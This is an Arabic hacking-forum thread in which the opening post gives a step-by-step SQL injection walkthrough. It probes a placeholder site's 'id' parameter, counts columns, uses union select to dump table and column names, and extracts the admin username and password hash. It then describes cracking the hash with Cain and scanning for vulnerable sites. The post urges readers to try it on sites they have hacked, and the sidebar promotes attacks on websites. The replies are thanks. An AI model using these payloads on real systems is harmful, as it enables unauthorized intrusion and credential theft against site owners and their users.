1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

شرح ثغرات || sql injection || وفك تشفير الباسورد || والبحث عن المواقع المصابه

الموضوع في 'المواضيع المُكرّرة والمُخالفة' بواسطة Ynoof, بتاريخ ‏2 ديسمبر 2011.

كاتب الموضوع : Ynoof المشاهدات : 12,314 الردود : 18 ‏2 ديسمبر 2011
حالة الموضوع:
مغلق
  1. غير متصل

    Ynoof
    rank
    Developer

    عضو منذ:
    ‏2 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الوظيفة:
    sql Injection
    الإقامة:

    السلام عليكم ورحمه الله وبركاته

    كيفكم اخواني ان شاء الله بخير
    اليوم معانا شرح عن ثغرات sql injection الكل بيعرف يستغل هي الثغرة
    انا راح اضيف بعض اللمسات على الشرح للوصول الى الهدف بشكل سريع
    ورح اشرح كيف نبحث عن المواقع المصابه ببرنامج او موقع ... نتابع الشرح

    هات موقعك المخترق واستغل الثغره معانا

    كود PHP:
    http://www.sitename.com/main.php?id=232'
    نحط حرف طاء باللغه الانجليزي ' لمعرفه اذا كان الموقع مصاب او لا

    كود PHP:
    http://www.sitename.com/main.php?id=232 order by 1--
    order by تحديد عدد العواميد

    كود PHP:
    http://www.sitename.com/main.php?id=232 order by 1-- (no error) http://www.sitename.com/main.php?id=232 order by 2-- (no error) http://www.sitename.com/main.php?id=232 order by 3-- (no error) http://www.sitename.com/main.php?id=232 order by 4-- (no error) http://www.sitename.com/main.php?id=232 order by 5-- (ERROR!)
    اذن عدد العواميد 4 لانه في العمود رقم 5 طلع لنا خطا نرجع خطوة للخلف زال الخطا

    كود PHP:
    http://www.sitename.com/main.php?id=-232 union select 1,2,3,4--
    العامود المصاب رقم 3

    الان نريد معرفه اصدار قاعدة البيانات اذا كان الاصدار الرابع بيعتمد على التخمين وعلى حسب ذكائك
    اما اذا كان الاصدار الخامس فهو يعتمد على اظهار الجداول وملحقاتها

    كود PHP:
    http://www.sitename.com/main.php?id=-232 union select 1,2,@@version,4--
    طلع لنا الاصدار الخامس

    كود PHP:
    http://www.sitename.com/main.php?id=-232 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database()--
    راح تطلع لنا جداول كثيرة من ضمنها جدول الادمن ..
    " admin"

    اذن نشفر الجدول من هذا الموقع

    http://www.waraxe.us/

    admin = 0x61646d696e

    اذن الاستغلال راح يكون بهذا الشكل

    كود PHP:
    http://www.sitename.com/main.php?id=-232 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name=0x61646d696e--
    خليناة يخرج لنا العواميد الموجودة في جدول الادمن

    Admin_Username, Admin_Pass, Admin_credentials, User_credentials, Members

    نحتاج منهم Admin_Username, Admin_Pass

    اذن الشكل النهاي للاستغلال طلع لنا يوزر الادمن والباس

    كود PHP:
    http://www.sitename.com/main.php?id=-232 union select 1,2,group_concat(Admin_Username,0x3a,Admin_Pass),4 FROM
    admin : c1f6eb6f47b8fad0d1d3746bcd7167ed

    الباس مشفر في مليون طريقه لفك الباسورد
    والافضل طبعا قواعد الريمبو وتحميلها 25 جيجا )2:"
    ماقدرت احملها ..

    طيب في طريقه ثانيه عن طريق البروتو فورس تابع معي كيفيه قك الباسورد ببرنامج cain

    لتحميل البرنامج

    اظغط هنا

    نتابع الشرح بالصور


    [​IMG]

    [​IMG]

    [​IMG]

    [​IMG]

    [​IMG]

    [​IMG]

    تم فك التشفير

    طيب الان نستخرج المواقع المصابه عن طريق الفحص
    نتابع تحميل البرنامج + الشرح [ مرفق ]

    اظغط هنا

    من هنا ننهي موضوعنا باحلى سلام .. واتمنى الكل يسفتيد من الشرح ولو بالقليل
    يعطيكم العافيه .. في امان الله

     


    جاري تحميل الصفحة...
  2. غير متصل

    NaZy
    rank
    Developer

    عضو منذ:
    ‏4 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: شرح ثغرات || sql injection || وفك تشفير الباسورد || والبحث عن المواقع المصابه

    الله يعطيك العافية
    مبدع يآ عمي الشيخ *:"
    شوي شوي علينآ
    مآا نستحمل الابداع&:"
     


  3. غير متصل

    moadd
    rank
    Developer

    عضو منذ:
    ‏4 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: شرح ثغرات || sql injection || وفك تشفير الباسورد || والبحث عن المواقع المصابه

    يعطيك العافيه علا مجهودك الرائع
    وطرحك الراقي^:"
     


  4. غير متصل

    K ! N G
    rankrank
    V • I • P

    عضو منذ:
    ‏4 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:

    رد: شرح ثغرات || sql injection || وفك تشفير الباسورد || والبحث عن المواقع المصابه

    شكرا أخي موضوع فالقمة merciii
     


  5. غير متصل

    slam
    ExpErt DeveloPer

    عضو منذ:
    ‏14 سبتمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    الإقامة:

    رد: شرح ثغرات || sql injection || وفك تشفير الباسورد || والبحث عن المواقع المصابه

    مشكور يالغالي جاري تقييمك !:"
     


  6. غير متصل

    Raf-dz
    rank
    Developer

    عضو منذ:
    ‏6 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: شرح ثغرات || sql injection || وفك تشفير الباسورد || والبحث عن المواقع المصابه

    يسلمو صآحب الموٍضوٍع
    ^:"
     


  7. غير متصل

    NaZy
    rank
    Developer

    عضو منذ:
    ‏4 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: شرح ثغرات || sql injection || وفك تشفير الباسورد || والبحث عن المواقع المصابه

    الله يعطيك العافيه
    شرح رائع وسهل
    الله يوفقك
    )5:"
     


  8. غير متصل

    MAX PWORE
    rankrank
    DeveloPer Plus

    عضو منذ:
    ‏16 سبتمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: شرح ثغرات || sql injection || وفك تشفير الباسورد || والبحث عن المواقع المصابه

    بآرك الله فيــك أخوي الغآلي
     


  9. غير متصل

    SIR_DANGER
    rank
    Developer

    عضو منذ:
    ‏8 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: شرح ثغرات || sql injection || وفك تشفير الباسورد || والبحث عن المواقع المصابه

    وعليكم السلام ورحمة الله

    تسلم يمينك يالغالي

    بانتظار المزيد
     


  10. غير متصل

    الحربي
    rankrank
    DeveloPer Plus

    عضو منذ:
    ‏9 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: شرح ثغرات || sql injection || وفك تشفير الباسورد || والبحث عن المواقع المصابه

    ابدعت يالغالي ( :
    الله يعطيك العافيه
    ولاتحرمنا من ابداعاتك
    وجاري التجربة
    ,,
    ^:"
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...